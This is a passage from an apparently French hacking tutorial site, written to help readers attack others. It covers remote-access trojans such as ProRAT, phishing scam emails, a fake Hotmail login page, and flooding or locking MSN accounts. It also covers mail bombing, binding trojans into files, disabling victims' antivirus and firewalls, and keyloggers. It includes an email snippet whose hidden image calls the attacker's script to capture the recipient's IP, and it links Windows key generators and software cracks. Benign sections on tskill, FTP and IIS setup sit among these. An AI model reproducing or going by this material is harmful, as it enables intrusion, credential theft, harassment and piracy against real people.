ensuite quelque chose comme "\\name\c" ou name est le nom du pc et c le nom du
lecteur.
Tu dois avoir configurer votre pc
avec des protocoles réseau standard de type NetBEUI et TCP/IP .
20. Contrôle à distance
De nos jours il peut être pratique
d'avoir accès à distance à un de ses pc. Via le protocole ssh et le
logiciel putty vu précédemment il y a facilement moyen si l'on connaît les
mot de passes et bien sur l'ip ou un indicatif autre. Frauduleusement le
contrôle à distance est déjà plus difficile. Via un trojan de type
backdoor (ex : ProRAT) on peut désactiver les sécurité de windows, ouvrir
un port et prendre le contrôle. La cible ne doit pas être équipée
d'antivirus qui connait le trojan. Comment ça marche ? Il faut d'abord
envoyer le trojan, ce dernier fait office de serveur entre la cible et le
pirate. Ensuite le pirate via le prog du trojan se connecte au serveur
avec l'ip de la cible. En fonction du type de trojan tout est faisable :
recherche, damages, téléchargement, screenshot, informations, etc. Bien
que je déconseille ProRAT , tu peux aller le dl sur le site du fabricant,
le mot de passe pour le dézipper est 'pro'
21.
Lancer plusieurs sessions msn
Je sais ce n'est pas vraiment du
piratage mais bon c'est quand même très pratique. Le petit prog qui permet
ce miracle s'appelle Msn loader universal; il permet de lancer autant de
sessions MSN Messenger ou WIN Messenger que vous le voulez. De plus il est
très petit néanmoins si tu as MSN+ mieux vaut utiliser un plugin. clique ici pour télécharger Msn loader
universal (3Ko) MSN spy 2004
est un petit programme très amateur qui permet via un serveur souvent hors
service (hélas) de voir qui vous bloque où est hors ligne sur MSN. Perso
j'utilise éthéreal là on est sur. télécharger : • MSN
spy (740Ko .zip) • nouveau : http://dagost.free.fr/msn_status.htm
22 naviguer sous une fausse ip
Pratique pour rester caché ou se
sécurisé lors d'un mail bombing par exemple. voilà une liste de site et de
logiciels (avec leur code de validation pour les freewares) qui proposent
de te naviguer en cachant ton ip souvent par l'intermédiaire d'un proxy.
• Anonymous browzing il faut
s'enregistrer... faux nom comme d'habitude :) • proxy
way, (en anglais) permet de naviguer derrière un proxy (il faut
connaitre un proxy) il y a une bonne aide • anonymous guest (en anglais) teste la qualité des
proxy et leur fonctionnalités ->pour envoyer un mail anonyme : http://www.fakemailz.com (en anglais) + regarde le
tutorial sur les proxys. + le
tutorial 2
23. commande dos pour killer un processus
La commande est tskill suivi du nom
du processus, pour ferme le bloc note par exemple : tskill notepad. On
peut aussi fermer sa connexion internet. Attention il faut être admin pour
fermet certains processus et si tu les fermes tous la session se ferme.
Voici les détails de cette commande :
tskill {idprocessus |
nomprocessus} [/server:nomserveur]
[/id:idsession | /a] [/v]
idprocessus ID du processus à terminer. nomprocessus Nom du
processus à terminer. Vous pouvez utiliser des caractères génériques pour
indiquer ce paramètre. /server:nomserveur
Indique le serveur Terminal Server qui contient le processus auquel
vous souhaitez mettre fin. À défaut, le serveur Terminal Server en cours
est utilisé. /id:idsession
Met fin à
l'exécution du processus dans la session spécifiée. /a
Met fin à l'exécution du processus dans toutes les
sessions. /v Affiche des informations
sur les actions en cours d'exécution.
24. lynx - un navigateur web sous forme de
texte
Que tu aies un portable avec grs, un
56Ko, envie de faire comme les grands, ou que tu veux plus de sécurité,
lynx est fait pour toi. Concrètement lynx est un navigateur (comme
Internet explorer ou Modzilla) sauf qu'il n'affiche que les textes tout en
gérant bien le code html et php. D'origine un programme de Linux, lynx
existe en version pour tous les Windows à partir de la version de
95. Il est en anglais mais très simple, quand tu l'as installé (très
simple sur cette version) lance le et à chaque fois que tu appuieras sur
la touche g (go) le programme te proposeras de rentrer l'url à
visiter.
téléchargements
: • lynx.exe 1,73 Mo • lynx.exe (zippé) 1,71 Mo
25. Pirater un compte Netpassport (Msn &
hotmail)
IL n'y a pas de programme proprement dit qui te trouvera le
mot de passe d'un compte Microsoft Netpassport. Même à l'époque ou Msn et
Hotmail se faisaient régulièrement attaqués il n'y en a jamais eu...
Même s'il n'est pas impossible d'avoir ces informations tout ceci
reste difficile par une manière directe. néanmoins des solutions existent,
bien souvent en jouant sur l'erreur humaine, le social enginering (ci
dessous)
1. le fake
mail
Tu fais croire à ta cible qu'elle pourra découvrir
tous les mdp qu'elle voudra avec une fausse technique que tu lui donnes
(voir exemples) En fait tout cela est faux (fake en langage pgm) et
tu récupères ses informations. note : si tu as une adresse plus
sérieuse que passmail@hotmail.fr
(qui n'existe pas) ça le fera plus. On trouve ce genre de message un peu
partout sur les petits forum traitant du piratage.
exemples: Voici comment "Hacker" le compte d'un "ami" .
Vous pouvez obtenir le password de votre "ami", et c'est même Hotmail
qui vous le dira !! Voici comment: Méthode:
1.Entrez dans
votre compte e-mail . 2.Allez dans "Nouveau Message" 3.Dans le
champ "À", tapez: passemail@hotmail.fr
(là tu y met ton adresse à toi ;) ) 4.Dans le champ "Objet", tapez: Password Retrieve
5.Dans le champ du message, tapez:
209.34.567.12/passwriter/passemail@hotmail.fr"passemail@hotmail.fr/INSCRIVEZ
VOTRE ADRESSE EMAIL/somms/ read/send./somms/INSCRIVEZ VOTRE
PASSWORD/56.23.78 /somms/ 124.23.456/INSCRIVEZ LE LOGIN DE LA
VICTIME/passretrieve101> 6. Envoyez et attendez quelques heures !!
Exemple: Si mon adresse est "moi@hotmail.com" et mon password
"XXX", et votre victime "victime@voila.fr" alors le message sera comme
ceçi : 209.34.567.12/passwriter/passemail@hotmail.fr"> passemail@hotmail.fr101/moi@hotmail.com/somms/
read/send./somms/XXX/56.23.78 /somms/ 124.23.456/victime@xxxx.fr/vous
trouverez le mot de passe ici !!!/>
je me degage de toute
responsabilité, g testé personnellement, ca marche !!
2eme
exemple de fake
Méthode:
1.Entrez dans votre compte e-mail . 2.Allez dans "Nouveau
Message" 3.Dans le champ "À", tapez: robotmsn@hotmail.com 4.Dans le
champ "Objet", tapez: mot de passe oublie 5.Dans le champ du message,
tapez: robot.msn7@hotmail.com :
INSCRIVEZ VOTRE ADRESSE EMAIL INSCRIVEZ VOTRE PASSWORD robot.msn7@hotmail.com : NSCRIVEZ
LE LOGIN DE LA VICTIME 6. Envoyez et attendez quelques heures !!
.
2. Le fake
site
Il suffit de copier à l'identique le site de mail de
hotmail (très simple : copie colle la source de plus le décor autour du
formulaire est composé de trois Iframes) et de modifier le destinataire
des informations de conexions (hotmail devient toi) ensuite redirige le
pigeon sur www.hotmail.com après un message d'erreur et le tour est joué.
Il croira s'être gouré en tapant... Ci-dessous des informations sur la
création d'un formulaire et une page hotmail où tu pourras insérer ton
formulaire. Téléchargements : **fakesite cgi
** • code formulaire pour cgi/mail (.doc pour
word) **fakesite
php ** • page fakesite php exemple en
ligne **divers** • code html d'un page hotmail vierge (format
texte) note : n'hésitez pas à regarder et
modifier les sources pour y faire des modifications d'abord pour vous les
personnaliser mais aussi pour améliorer le
graphisme.
3. Pro-hack (vieux rêve)
Tu
infiltres le réseau d'hotmail via une trojan autonome capable de décoder
le tableau des mots de passes et de t'envoyer les informations que tu
cherches. ça relève du domaine de l'impossible mais quelqu'un qui
travaille dans les locaux de Microsoft pourrait le faire.
4. méthode diplomatique
Écris un
email à hotmail pour signaler un viol de leur charte de bonne conduite
(donne des exemples) par l'adresse que tu veux supprimer. Soit l'adresse
cible gicle soit elle reste.
5. Moyens alternatifs (pas
testés profondément)
Il existe des
programmes pour flooder le compte MSN / hotmail et donc le paralysé,
temporellement ou définitivement. Voici deux programmes : l'un flood en
essayant des logins et des mots de passes et l'autre en rentrant le
contact dans MSN sans cesse... Seul problème il faut que le programme
tourne tout le temps ou au moins assez longtemps pour faire planter le
compte. programme 1 : Wolf pack MSN bomber
: Écrit en Visual C++ , ce
programme permet de “flooder” de demande d’add-contact un utilisateur MSN.
Attention, si un nombre trop grand de demandes est envoyés, il est
possible de flinguer définitivement en compte et d’empêche un utilisateur
avec cette identité. Ce programme est détecté par ton antivirus lors de
son utilisation. .
télécharger 703Ko .zip programme 2 : Ice cold reloader : (100%
sur ) Ce programme permet de freezer le compte MSN (hotmail) de votre
choix. Vous rentrez l'adresse que vous voulez freezer et la le
logiciel se connecte sur les serveurs net passport en mettant des
pass erronés.Ce qui a pour effet de flooder l'adresse de demandes, et la
victime ne peux plus se connecter sur MSN ou pour consulter ses mails.
Attention!! une fois que vous quittez le logiciel le compte n'est plus
freezer et si le contact est sur MSN il n'a pas de problème. Ce prog est
correcte et montre l'évolution du freezage, quand tu le quittes il lance
une page internet. .
télécharger 6Ko .zip screenshot de
ce que ce prog donne :
6. Brute
force : se reporter au programme wwwhack qui permet de bruteforcer un
formulaire - ne marchera pas pour hotmail.
26. Scanner l'arborescence d'un site
Des programmes permettent de te
donner l'arborescence complète d'un site, il te permet par exemple de voir
le chemin des dossiers en php, des forums, des skyblogs, récupérer des
médias protégés, un dossier entier sans se taper le site, etc Via mon
site tu peux télécharger le plus connu des scanners de site : • Intellitamper (v2.07) scrennshot du scan du site de mon
lycée • Intellitamper (v2.08 bêta 4) la toute
dernière version, cette version corrige les erreurs qui rendaient
Intellitamper 2.07 instable et le forçait à fermer.
|
Si certains dossiers protégés sont
impénétrables, l'utilisation de logiciels équivalent comme Custo
peut corriger ce problème mais Intellitamper fait l'affaire dans 95%
des cas s'il n'y a pas de Htaccess. Liste ci
dessous. . télécharger Custo
(395Ko) |
description officielle traduite de l'anglais
:
- trouve les liens vers les fichiers
html, Java script (partiellement), les fichiers Macromedia Flash SWF
... - possibilité de passer par un proxy - matériel pour les
sites protégés par mots de passe - Interface d'exploration simple
et efficace, présente les dossiers, les fichiers et les liens
trouvés (emails compris) - La sélection des fichiers ou des
dossiers complets est possible pour le téléchargement -
Découverte de dossiers et fichiers cachés grâce à une recherche avec
dictionnaire - Accès direct pour à les fichiers pour les ouvrir
dans un navigateur ou avec un logiciel
quelconque. |
liste de programmes similaires
:
27. Pirater un site via un forum en phpBB
Le fichier config.php contient le
login, l'url et le mot de passe du ftp du site d'où est le forum ! L'ennui
c'est que les nouvelles versions de phpBB protègent bien ce fichier. Pour
voir le fichier config.php dans Intellitamper rentre l'adresse complète,
exemple : au lieu de 'http://site.free.fr' rentre
'http://site.free.fr/forum/phpbb2/config.php' en espérant qu'il n'a pas
été changé de place par sécurité, plus d'infos sur le forum.
28. Faire Windows Update discrètement
Si tu as un windows 'légal' c ceci
ne te servira pas spécialement, mais si tu ne veux pas te faire espionner
et contrôler par Microsoft lors des mises à jours de windows voici deux
solutions dont la première spécial pour xp.
1. configuration du
firewall Interdit l'accès au net du programme "Noyau et système Xp". Ce
module ne servant qu'à t'espionner devrait d'ailleurs être toujours
bloqué. 2. modification du registre système regedit dans éxsécuter puis :
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
et mettez la valeur 1 à la clé REGDONE.
29. Générer une clé de Windows xp et la remplacer/voir la
clé active
voici un
programme pour générer des clés windows xp et un autre pour l'utiliser
(remplacer l'ancienne) et voir la clé en cours. • http://dagos.free.fr/prog/XP.exe
92Ko • http://dagos.free.fr/prog/keyfinder.exe
258Ko
30.
refaire fonctionner un freeware après le temps
prévu
la réinstallation du programme ne change rien vu que la trace de
son installation ultérieure est enregistrée dans le registre système de
windows. Voici deux techniques pour remédier à ce problème sans payer et
sans réinstaller windows. Je suppose que la restriction est basée sur le
temps.
1. Suppression manuelle du registre système Cela
consiste à supprimer les 'clés' du programme en ouvrant le registre
windows (tape regedit dans EXECUTER pour l'ouvrir). Évidement c'est plus
simple si tu connais le nom des clés. En tout cas ce sera long.
2. faire croire à une date ultérieure retarder
l'horloge ne marche plus en général sur les nouveaux programmes. Sur les
petits ou les vieux progs de test il suffisait en effet de retarder la
date de quelques jours pour que le programme redevienne utilisable. Il
existe des programmes qui génèrent des .exe modifiés... Ces programmes
font croire au luncher une date préprogrammée et donc rend possible
l'exécution du programme ! je te propose data cracker c'est un petit prog
gratuit qui créer un nouveau .exe mais qui marchera vu qu'il sera craké ,
voici l'url de téléchargement : . http://dagos/free.fr/prog/Dateckr.zip Après avoir craker ton logiciel utilise le
nouveau .exe
Il existe aussi
un logiciel prévu pour ceux qui ont perdus leur clé d'activation, il
permet de bloquer le temps d'essai,le rendant ainsi disponible illimité :
http://www.chez.com/wblum/ Il permet de neutraliser son
blocage en lui donnant une durée d'utilisation plus importante
31. Créer un serveur chez sois (ici
FTP)
Un
serveur c'est un petit programme de quelques Ko que tu peux télécharger
sur le net donc ne t'inquiètes pas ce n'est pas très compliqué à mettre en
place. Sur http://www.cestfacile.org/creer_un_serveur_ftp.htm#serveur
tu peux trouver ce programme. Avoir un serveur ftp, un serveur de donnée
donc comporte plus de risques que si tu n'avais pas de serveur mais ils
sont minimes et même si tes logins et mots de passe sont découverts à part
prendre, mettre ou supprimer un hacker ne peut rien faire : le protocole
ftp n'a que 3 commande : PUT GET et DELETE .
pour t'y connecter il
te faut . un client ftp : internet explorer !
par exemple. tu tapes l'url ftp://ip_de_ton_serveur/
et tu rentres login & mot de passe dans FICHIER/se conecter en tant
que. L'invité de commande dos fait client ftp : :
l'adresse ip de
ton serveur c'est l'adresse ip de l'ordinateur qui a le serveur ! (tu l'as
en tapant ipconfig dans l'invité de commande dos de windows) Comme c'est
un serveur FTP tu peux te connecter dessus avec Internet explorer en FTP
(avec mot de passe et log) parce que INTERNET EXPLORER EST UN CLIENT FTP ET HTTP
! - peutêtre pas le meilleur certes mais il est largement
suffisant.
notes : ftp :
port 21 et 20 - http : port 80 (ça peut servir) Aides :
1. Connexion impossible à partir d'un ordi autre
que le serveur Ce problème est lié au port 21 qui peut être
bloqué par un firewall mais aussi par le parefeu windows. Il faut donc
faire des tests quand tout est désactivé.
2. L'adresse n'est pas ou plus correcte
En général c'est lié à un problème d'IP dynamique. Déjà tu peux
avoir un nom de domaine (ip en lettre) gratuitement sur des sites comme https://www.dyndns.com/ mais il faut aussi que ton
adresse Ip qui bouge tous les 20 minutes soient mise à jour. Sinon le nom
de domaine ne correspond plus à l'ip du serveur. Des petits programmes le
font très bien, moi j'utilise DynDNS updater.
3. dossiers inaccessibles Ces
problèmes sont liés au root directory dans la configuration. Fait des
changements pour tester. Mets c:/ showing etc...
4. clients ftp Mozilla contrairement
à Internet explorer n'a pas un module de client FTP intégré. Il reste
toujours MS DOS où un freeware client ftp trouvable très facilement sur le
net.
Au sujet de IIS
: si vous décidez d'installer un serveur quelconque (smtp, ftp ou http)
pensez à arrêter IIS, il peut y avoir des conflits au niveau des ports
d'écoutes.
32. Scripts HTML et techniques anti pub ,
frames et publicités quelconques.
Voila
(hébergeur gratuit avec un système de transfert de fichier non ftp donc
mauvais, sans php) pour éviter d'avoir cette frame à l'écran la
seul parade est de rajouter : /index.html à la fin des liens
sans
: • http://site.voila.fr/ttgerminois et avec :
•
http://site.voila.fr/ttgerminois/index.html
Lycos (hébergeur gratuit 50Mo (base php mysql 10Mo)
)
scripts 1 et 2 - enlève la
pub de 5 cm à droite et l'énorme pub bleu du
haut
Code: |
<script
language="JavaScript"> <!-- function
kill_ad() { window.top.document.body.cols =
"*,0"; setTimeout("kill_ad()",10); } function
setInterval(x,y) { return
0; } window.setTimeout("kill_ad()",10); function
MM_swapImgRestore() { //v3.0 var i,x,a=document.MM_sr;
for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++)
x.src=x.oSrc; }
function MM_preloadImages() {
//v3.0 var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new
Array(); var
i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0;
i<a.length; i++) if (a[i].indexOf("#")!=0){
d.MM_p[j]=new Image;
d.MM_p[j++].src=a[i];}} }
function MM_swapImage() {
//v3.0 var i,j=0,x,a=MM_swapImage.arguments;
document.MM_sr=new Array;
for(i=0;i<(a.length-2);i+=3) if
((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x;
if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];} }
function
MM_openBrWindow(theURL,winName,features) {
//v2.0 window.open(theURL,winName,features); }
function
MM_findObj(n, d) { //v4.01 var p,i,x; if(!d) d=document;
if((p=n.indexOf("?"))>0&&parent.frames.length)
{ d=parent.frames[n.substring(p+1)].document;
n=n.substring(0,p);} if(!(x=d[n])&&d.all)
x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++)
x=d.forms[i][n]; for(i=0;!x&&d.layers&&i<d.layers.length;i++)
x=MM_findObj(n,d.layers[i].document); if(!x &&
d.getElementById) x=d.getElementById(n); return
x; } --> </script> <script>
function
pub(){
window.top.document.body.cols="*,0";
}
</script> |
script 2 - ferme le
popup de démarrage
Code: |
<script
language="javascript"> function open () {return true;}
</script> | |
téléchargements des scripts : [1]
[2]
Ifrance IFrance ajoute seulement des pubs aux
fichiers *.html. Donc remplace index.html par index (aucune
extension) ou *.shtml
Utilise le script suivant : Tu dois
placer d'abord ceci après <HEAD> <script language="javascript"> if
(window.top.frames[0].name == "pubframe") window.top.document.body.rows =
"0,*"; ie5=false;ie4=false;ie55=false;ie6=false; ifrUrl = '';
stopMove(); stopVis(); resetVis(window); cachePub();
window.open = false; </script>
et ceci après
<BODY> <div id="pubLay"
onLoad="javascript:resetVis(window);"><DIV>
33. créer un
serveur windows de type IIS
Windows Xp propose des outils pour se créer
facilement un serveur chez sois. Concurrent du très puissant et efficace
mais complexe serveur Apache le serveur windows IIS permet de créer très
facilement un serveur http aux normes et un serveur ftp et smtp. Le
serveur http marche parfaitement mais le serveur ftp pose des problèmes au
niveau des créations des comptes utilisateurs, en gros seul quelqu'un
ayant un compte sur la machine peut s'y connecter avec son nom de compte
et son mot de passe. IIS est un composant optionnel windows, il faut donc
pour l'installer avoir le cd de windows : va dans ajout/suppression de
programmes qui est dans le panneau de configuration et clique sur
composants optionnels. Ensuite après son installation règle les options
dans outils d'administration/Serveur internet (IIS). Pour plus
d'information se reporter au sujet 31 ou encore sur le forum.
34. Insérer un exécutable .exe dans un fichier
quelconque
Ce procéder s'appelle binder, en français
'dissimuler'. Ce procédé est très pratique pour infecter une personne, en
effet il suffit de lui envoyer un fichier avec un trojan, un virus, etc
binder dedans pour l'infecter sans que ta cible ne s'en rende compte. Les
binders pour le hacking ont plus d'options que ouvrir/executer il peuvent
par exemple placé le programme bindé directement dans le répertoire
system. Le problème c'est que 50% des programmes binder et joiner
téléchargeables sur le net sont corrompus, c'est à dire qu'ils contiennent
des virus ou trojan ou en insère un dans le fichier crée à la suite du
bindage. Pour plus de sécurité tu peux aussi télécharger un programme
payant (. nbinder par exemple) mais ils ne sont pas
spécialement fait pour le hack comme Binder v2.1 par exemple (voir
ci-dessous) Téléchargements : . 32 Binders signifie que le binder marche,
qu'il est sain même s'il est détecté par un antivirus et que le
fichier bindé est sain aussi. certains binder ne compilent pas
directement, il faut juste que tu renomme le fichier crée en
.exe. certains binders proposent d'implanter une icône au
fichier bindé, certains en ont en pack en plus. dl indique qu'il
y a moyen de faire télécharger/uploader un fichier via le net - détecté
par tout firewall bien entendu.
35.
spammage par mail bombage
Consiste tout simplement a
envoyé pleins de mail sur une boite pour la saturée ou juste déranger son
propriétaire. Mailler V3 est un programme de mail bombage non détecté par
les antivirus pour le moment lors de l'installation s'il y a un problème
de .dll clique sur oui pour garder tes dll. Kaboom qui n'est pas non plus
détecté par les antivirus est un mail bomber basique, j'ai placé une liste
de mail bomber ci-dessous. Un serveur smtp sert à envoyer des mails, ce
n'est donc pas celui à qui tu envoie mais toi, si tu veux connaitre ton
serveur smtp (simply mail transfert protocole) clique ici c'est par exemple smtp.neuf.fr,
smtp.exemple.fr il y a donc pas besoin de login et de mdp, rien ne
t'empêche de te créer ton propre serveur smtp mais tu peux passer par tous
les serveurs smtp existant. Attention tes mails ne sont pas vérifiés par
sender id. télécharger :
• Mailler
V3 . Kaboom
Les mail bombers ci-dessous
fonctionnent mais sont détectés par les AV comme flooders donc
supprimés par défault : |
lien : •
générateurs de messages de Spam et de sources
(en anglais)
36.
wwwhack - hacktool brute force avec proxy manager
En plus d'avoir un manageur de proxy qui permet
de changer de proxy toutes les x requêtes selon votre propre liste de
proxy wwwhack permet d'effectuer de la brute force sur les protocoles
suivants : POP3 , FTP, formulaire html, basic html (htaccess). Il
contient comme outils un DNS, petit programme qui change un nom de domaine
en son adresse IP correspondante (permet de ne pas faire de ping) et en
bonus un crasher de serveur par flood. Oui il pourrait servir à hacker les
adresses hotmail donc car malgré que pop.hotmail.com ou smtp.hotmail.com
n'existent pas ça reste un serveur perl avec un formulaire html mais
hotmail bloque au bout de x requêtes (cf: icecold reloader et autres
flooders) • télécharger wwwhack (.rar 363Ko)
37. Les
trojans
Les trojans, appelés aussi chevaux de Troie,
backdoor, troyens, ... sont des petits programmes intrus installés sur un
ordinateur. Ils différent légèrement des spyware et des keyloggers car
leur rôle est supérieure à du simple espionnage et leurs effets sont le
plus souvent néfastes pour l'intégrité des données. On distingue plusieurs
grands types de trojan : . trojan de dl : permet de
rechercher et de récupérer des donnés sur la machine trojanée, ne pas
confondre avec trojans downloaders qui eux téléchargent des
virus . trojan standard : comprend généralement la fonction des trojans de
dl mais a des capacités supérieures allant du simple screenshot ou
exécution de commande à la destruction de données. . backdoor : ouvre un
port virtuel à l'instar du firewall windows et envoie l'ip, permet un
début de piratage . cheval de Troie : au sens négatif télécharge une
multitude de virus et autres malwares par un port ouvert par un backdoor
par exemple. . dropper : il s'agit de programmes pour
binder note : des trojans proposent toutes ces options (proRat)
mais leur taille et le fait qu'ils soient très connus des antivirus les
rend plus difficiles à utiliser.
Utiliser un trojan est simple mais la machine
cible doit répondre à deux critères : avoir un système d'exploitation
compatible au trojan et être mal ou pas du tout protégée. Le "kit" trojan
est toujours composé, dans le cas où tu dl un trojan tout fait d'un site,
du master. Le master, le maître, est le programme qui contrôle le trojan,
en général il permet de créer et de personnaliser ton propre trojan. Le
maître peut être détecté par les antivirus mais est sans danger s'il n'est
pas lui même virussé. Si ton trojan est placé sur la machine cible, qu'il
peut se conecter au net alors le master n'a besoin que d'une information
pour te permettre de contrôler la machine cible : l'ip de la machine
cible. Certains trojans envoie l'ip automatiquement par mail si tu dispose
d'un serveur smtp, ou par ssh pour les plus perfectionnés.
Pour envoyer un trojans de très nombreuses
techniques existent et sont inventables avec un peu d'ingéniosité. Déjà
pour qu'un trojan même ultra connu soit indétectable il suffit de fermer
l'antivirus de la victime, pour cela de nombreux programmes, des AV_killer
existent [lien] Il faut aussi penser à couper le firewall
s'il y en a un (pour permettre au trojan de communiquer via le net sans
être bloqué), la plupart des AV_killer ont cette option. Ci dessous les
techniques les plus courantes pour envoyer trojans, virus et keyloggers
: . bindage via un prog, si tu bindes un trojan à un AV_killer c'est
doublement efficace. . download forcé, pour les
webmaster à chaque téléchargement un deuxième téléchargement se lance
(avec le trojan) comme ça la victime peut se tromper et lancer direct le
trojan. Dans ce cas là prévoir un trojan qui se reproduit et pas
d'AV_killer car détecté directement. . download via mail, le trojan
est en pièce jointe, avec un email avec du html inséré faire télécharger
la pièce jointe automatiquement . faux lien de téléchargement,
le lien recherché emmène vers un trojan et non vers le fichier désiré. Les
sites qui font ça sont vites repérés par les
connaisseurs. . sur floppy, disquette, cd avec un autorun
--> pas
à distance mais le plus efficace car : rapide, place énorme pour stoker
les malwares, on peut définir les ordres d'action : 1.Av_killer 2.trojan
3.keylogger 4.virus 5.pc_killer par surcharge électrique (cd uniquement
car programme lourd)
Si tu découvres un trojan actif sur ta
machine il faut la soigner calmement, un trojan comme on l'a vu ci dessus
n'est pas forcement dangereux et surtout pas forcement contrôlé. La
première chose à faire est de couper toutes les conexions réseaux et
Internet pour éviter la propagation et/ou le piratage à distance. Ensuite
enlève le démarrage automatique du trojan en allant dans msconfig puis il
faut tenter de couper le trojan, pour cela il suffit de repérer son
processus dans le gestionnaire des taches (ALT CTRL SUPPR) et de le fermer
mais en général dès que tu le fermes un autre se rouvre. Évite de
redémarrer si tu n'a pas vérifier ton msconfig. Certains trojans
dispersent des virus un peu partout et peuvent saturer ton antivirus,
n'hésite pas à redémarrer en mode sans échec et de passer l'antivirus avec
ce mode (attention ne pas se connecter au net avec le mode sans échec).
Après le passage de l'antivirus il te suffit de scanner la totalité de tes
données avec des logiciels comme adaware ou encore spybot (téléchargeables
sur ce site). Si le trojan est passif c'est à dire compressé
dans une archive par exemple supprime le simplement.
Téléchargements : . 14 dossiers et 53
trojans recensés ci dessous soit un total de 144 trojans :
38.
Quelques compilateurs
Ces compilateurs windows ou pour systèmes
alternatifs (GNU, Linux, ... ) fonctionnent et sont sécurisés, tu peux en
avoir besoin notement pour les bindages (où il faut souvent un exécutable
correcte et non un .bas .bat ) ou tout simplement pour concrétiser tes
programmes réalisés en basic, C, pascal, ...
nom
officiel |
capacités |
taille |
Bat2exe |
compile les .bat en .com (via
invité de commande) |
7Ko rar |
Quick batch compiler 2.0.7.1 (cracké !) |
compiles les .bat (et plus) en
.exe |
1.5Mo rar |
Quick
basic |
Quick basic standard avec
compilateur .exe |
1Mo zip |
Turbo Pascal and Turbo C: |
compilateur Pascal et
C |
|
Dev-Pascal : |
Compilateur Pascal |
|
Dev-C++ : |
Compilateur C / C++ (nécessite
make , un prog GNU) |
|
SmallC
: |
Compilateur C (via concole
ms-dos) |
|
BCX
|
Compilateur C / C++
win32 |
|
CoPascal |
extension de Pascal S
compileur |
|
P32
|
compilateur Pascal |
|
PowerPascal
|
compilateur Pascal |
|
Djgpp
|
compilateur C / C++ |
|
Free Pascal : |
compilateur Pascal
Win32/Linux |
|
ScriptBasic
|
interpréteur de
basic |
|
LCC-Win32 |
compilateur système pour
windows |
|
lcc
|
compilateur C standard
(ISO) |
|
Yabasic
: |
interpréteur basic &
vb pour windows ou Linux |
|
Pacific C for DOS : |
version gratuite d'un
compilateur professionnel C en msdos |
|
GNAT
: |
compilateur Ada95 |
|
Rapid-Q
|
compilateur Basic pour système
alternatifs (Linux,Unix) et Win32 |
|
Mingw |
module de Dev++
(GNU) |
|
B++
(recommandé par LsD) |
compilateur en pascal pour
transformer le basic en C ou C++ et le compiler |
|
39.Failles
N-Stealth est un logiciel qui
connait plus de 30000 failles dans sa base de donnée et qui en fonction
d'une ip scan et liste les failles utilisables selon les risques FAIBLE
MOYEN et ÉLEVÉ. La version gratuite permet juste de faire cela, la version
payante propose des informations sur les failles et les moyens de les
réparer. Ayant un serveur IIS sous windows Xp je me suis rendu compte que
certaines failles était bien réelles, en effet s'il est mal réglé mon
ordinateur peut être scanné en mettant juste /../ après une adresse, le
serveur parcours le répertoire précédent en fait, ceci est une faille de
catégorie faible bien sur. Malgré un scan long ce programme s'avère très
utile. [sujet
non-terminé] lien de téléchargement [lien]
40.Dvd : cloner,copier,enregistrer un dvd protégé ou
non
L'essentiel des dvd achetés dans le
commerce sont protégés de la copie et des logiciels standards comme Clone
DVD ne peuvent rien en faire. Mais vu que dans certains pays les lois sur
la reproduction n'existent pas il existe des décodeurs CSS. Dvd-Cloner III
intègre un décodeur CSS en plus de diverses fonctions qui se rapprochent
du célèbre CloneDVD. Dvd-Cloner III est payant car la version
d'essais ne fait qu'une copie partielle du dvd. Télécharges le crack à
partir de mon site ci-dessous, lis Installnotes.txt pour
l'installer. • crack • DvdCloner III (lien externe)
41.Sniffer
1.Généralités Un sniffer
permet de voir le trafic des données sur sur un réseau mais plus
généralement on attribue le terme "sniffer" à un programme qui permet de
récupérer des informations d'un utilisateurs sans installer de programmes
sur l'ordinateur cible, un sniffer est avant tout un script dans le cas
contraire on parle de stealer. Le principe est simple, on envoie un mail à
la cible, dans cet email en plus d'un message texte normal il y a du html
caché qui envoie certaines données de la cible à une adresse email, un
ftp, un ssh, ... bref sur un support qui permettra au pirate de récupérer
ces données volées. Ces données sont récupérées et traitées généralement
avec un script dynamique (php,cgi-bin,mysql,...). Avec un script html/php
on ne peut pas récupérer grand chose, pas de mot de passes, pas de données
précises mais l'ip de la cible, et quelques informations liées aux failles
du navigateur de la cible. Avec Internet explorer on peut récupérer la
dernière page visitée, ce qu'il y a dans le presse papier, par
exemples. 2.Fonctionement télécharger : • script
ip_sniffer 2Ko (récupère l'ip et la dernière page visitée
par la cible avant de lire son mail)
Tu dois placer le fichier
.php3 sur un ftp dont le serveur a une base de donnée dynamique php
(free,lycos,webzanine,...) ensuite écrit un mail à la victime en rentrant
le code html suivant , tu dois modifier les zones
vertes.
<html><head></head><body> message texte<br>message
texte <img src="http://www.url_de_ton_site.com/dossier/snif-ip.php3?hacker=ton_mail@provider.com&pigeon=mail_de_la_cible@provider.com"> </body></html>
Le principe est simple et consiste a
appeler une image qui est en réalité le script snif-ip.php3 situé sur un
de tes ftp, par défaut le script php insérera l'image white.gif qui est un
carré blanc donc invisible chez hotmail. Tu pourras modifier cela dans le
code source du script. En retour tu reçois un mail avec les
informations récupérer par le script [screenshot1] [screenshot2]. Selon la rapidité du serveur de
mail l'ip de la cible peut avoir changé, une simple requête ping te le
confirmera. Il est déconseillé d'envoyer de hotmail à hotmail par exemple
parce que c'est particulièrement long.
42. Éditeur Hexadécimal
Téléchargements : • Ultra Edit v10.10c (lien externe) [lien
mort ?] • crack
pour Ultra Edit v10.xxc .
winhex : éditeur hexadécimal .rar
11Ko . w32dasm : windasm éditeur hexadécimal pour win32
.rar 513Ko i voir aussi : cracking tools
43. Keyloggers
Un keylogger est similaire à un
trojan du fait qu'il fonctionne en intrus sur une machine et est en
communication (directe ou indirecte) avec celui qui l'utilise. Les
keyloggers ont une fonction unique : enregistrer les touches tapées au
clavier d'où leur nom Key (touche) logger (enregistreur). Le fichier où
sont enregistrés les caractères tapés (le log) peut être envoyé par
différentes manières : mail (le log est envoyé par pièce jointe à
l'adresse mail du hacker via un serveur smtp quelconque souvent à définir)
FTP (le log est enregistré sur ftp et tu dois lui donner login&mdp ce
qui pose des problèmes de sécurité) ou encore via ssh même genre que le
ftp. . Téléchargements (13) :
44. crypteur / décrypteur de html
Source Code Encrypter
v1.0
Chiffrer : compile le code html
préalablement rentrée ou coller dans le
